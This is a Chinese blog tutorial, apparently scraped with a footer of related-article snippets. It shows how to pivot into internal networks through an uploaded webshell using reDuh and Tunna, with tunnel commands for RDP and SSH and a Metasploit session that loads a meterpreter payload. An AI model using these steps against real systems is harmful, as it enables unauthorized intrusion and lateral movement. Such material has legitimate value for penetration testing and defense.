内网穿透工具Tunna和reDuh

1.1reDuh

下载地址:https://github.com/sensepost/reDuh

1.reDuh使用条件

(1)获取目标服务器webshell,且可以上传reDuh服务端对应脚本文件。

(2)知道目标服务器开放的内网端口,如远程桌面的端口是3389。

(3)目标服务器网络做了端口策略限制,只允许外部访问内网的80等特定端口。

2. reDuh使用命令

(1)本地具备java环境,可以使用pentestbox自带java环境

java -jar reDuhClient.jar  http://somesite.com/reDuh.aspx http or https port

(2)本地连接1010端口

nc -vv localhost 1010

(3)在java命令窗口执行

[createTunnel]1234:127.0.0.1:3389

(4)使用mstsc登录127.0.0.1:1234

1.2Tunna

https://github.com/SECFORCE/Tunna

(1)连接3389

python proxy.py -u http://172.0.0.1/conn.aspx  -l 1234 -r 3389 –v

通过查看网上相关文章,只见conn.jsp和conn.php实现端口转发成功

通过该方法访问内网的其他服务器,命令如下:

python proxy.py -u http://172.0.0.1/conn.php -l 1234 -a 172.0.0.2 -r 3389

172.0.0.1是webshell所在服务器,172.0.0.2是内网访问的服务器,3389为远程终端端口,有些服务器修改器默认端口为其它端口。本地直接登录远程终端地址127.0.0.1:1234即可。参数含义如下:

-l 表示本地监听的端口

-r 远程要转发的端口

-v 详细模式

2.连接SSH

对于SSH服务需要添加-s参数,才能保证连接的时候不会中断,执行命令:

python proxy.py -u http://218.4.45.152:8877/job/conn.aspx -l 1234 -r 22 -v –s

在本地使用ssh连接1234端口即可:

ssh localhost -p 1234

3.MSF利用tunna转发

将tunna_exploit.rb拷贝到msf的modules/exploits/windows/misc目录.

cp ~/tunna_exploit.rb /root/metasploit-framework/modules/exploits/windows/misc

msf > use exploit/windows/misc/tunna_exploit

msf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcp

PAYLOAD => windows/meterpreter/bind_tcp

msf exploit(tunna_exploit) > set RHOST 1.3.3.7  //注意这里是指本地的公网IP

RHOST => 1.3.3.7

msf exploit(tunna_exploit) > set TARGETURI http://219.x.x.x:8080/conn.jsp

TARGETURI => http://219.x.x.x:8080/conn.jsp

msf exploit(tunna_exploit) > set VERBOSE true

VERBOSE => true

msf exploit(tunna_exploit) > exploit –j

原文地址:http://blog.51cto.com/simeon/2112416

时间: 2024-11-07 21:26:24

内网穿透工具Tunna和reDuh的相关文章

一款好用的内网穿透工具,拯救没有公网IP的你

越来越多的用户没有自己的独立公网IP,在发布一些应用或者网站到外网的时候就是一件很麻烦的事情.请注意,我说的独立公网IP并不是说一定要静态公网IP.拨号上网动态IP也不一定不可以.我们要的就是网关出口一定要是公网IP,假如你的网关路由器WAN口是一个内网IP肯定不行.说明一点,ipv4 的内网IP 保留范围: Class A 10.0.0.0-10.255.255.255.Class B 172.16.0.0-172.31.255.255.Class C 192.168.0.0-192.168.

网络通: 免费一键内网穿透 方便配置

越来越多的用户没有自己的独立公网IP,在发布一些应用或者网站到外网的时候就是一件很麻烦的事情.请注意,我说的独立公网 IP并不是说一定要静态公网IP.拨号上网动态IP也不一定不可以.我们要的就是网关出口一定要是公网IP,假如你的网关路由器WAN 口是一个内网IP肯定不行.说明一点,ipv4 的内网IP 保留范围: Class A 10.0.0.0-10.255.255.255.Class B 172.16.0.0- 172.31.255.255.Class C 192.168.0.0-192.1

基于MetaSploit内网穿透渗透测试

自己在无聊捣鼓windows渗透的时候想到以往都是基于内网渗透,想要更加自由地进行渗透就需要内网穿透实现可以任意控制网段主机,同时也将端口转发作为自己的跳板.集成的脚本是考虑到在渗透的时候需要开启的工具繁多,所以尽可能能够一键开启工具,并且半自动化部署,可以优化前期的准备. 本文分成三个模块 ·利用natapp进行内网穿透 ·利用msfvenom生成后门渗透 ·半自动化脚本进行优化 利用natapp进行内网穿透 首先需要下载一个工具用于内网穿透,内网穿透主要是利用远程服务器将tcp连接转发到自己

内网穿透测试

个人用ngrok小工具做一个内网穿透测试,原理就是反向代理 http://531699aa.ngrok.io/proWms/prowmsapi/oms/receiveStockOutOrder 原文地址:http://blog.51cto.com/9381188/2104019

内网穿透新章法 serveo

非常非常适合临时对外演示的方案 步骤如下 1.本地起一个测试的web服务 /Users/mac/venv/typeidea/bin/python /Users/mac/PycharmProjects/typeidea-env/typeidea/manage.py runserver 8000 输出如下 System check identified no issues (0 silenced). July 29, 2019 - 17:52:55 Django version 2.2.3, usi

内网渗透工具介绍------Lcx.exe

0x00简介 Lcx是一款端口转发工具,可以将内网机器的端口映射到带公网IP的机器上.一般进行渗透的时候,通过web漏洞getshell之后,需要对其进行远程登录,这就需要用到端口映射. 0x01使用 第一步:在内网主机上上传lcx.exe文件,执行 Lcx.exe –slave RemoteHost RemotePort LocalHost LocalPort 如图中显示则连接成功 第二步:在公网机器上执行以下命令,监听51端口,转发到公网机器的3389端口 Lcx.exe –listen S

SSH反向隧道的内网穿透

环境如下: A机器两块网卡eth0(192.168.0.173).eth1(192.168.100.1),eth0可以上外网,eth1仅仅是内部网络,B机器只有eth1(192.168.100.3),和A机器eth1可以通信互联,外网无法ssh进入B主机,可以使用ssh的反向隧道实现. A: 1.首先在A 上编辑sshd 的配置文件/etc/ssh/sshd_config,将GatewayPorts 开关打开: vim /etc/ssh/sshd_config GatewayPorts yes

如何正确选择内网访问工具

如果没有公网ip的话,外网与内网的计算机节点连接通信时,需要能够顺利的进入到内网,为了实现这个过程,有很多现成的技术,比如ngrok,花生壳,零遁,vps,虚拟局域网,等等.表面看起来实现的是同一个功能,但是细节上差别还是很大的.首先ngrok呢,是一种软件,是做的一个反向代理,通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道.类似ngrok的软件还有很多的,它们主要用于在本地建网站来让外网访问到,由于软件是国外的,所以目前能接触到的都是国内的代理,所以适合用来建小网站.在这里

Linux 下内网流量控制工具

CentOS-TC(流量控制) 单IP限制下载命令: tc qdisc add dev eth1 root handle 1: htb r2q 1 tc class add dev eth1 parent 1: classid 1:1 htb rate 1800kbit burst 10k tc filter add dev eth1 parent 1: protocol ip prio 16 u32 match ip dst 192.168.0.131 flowid 1:1 查看TC的状态 t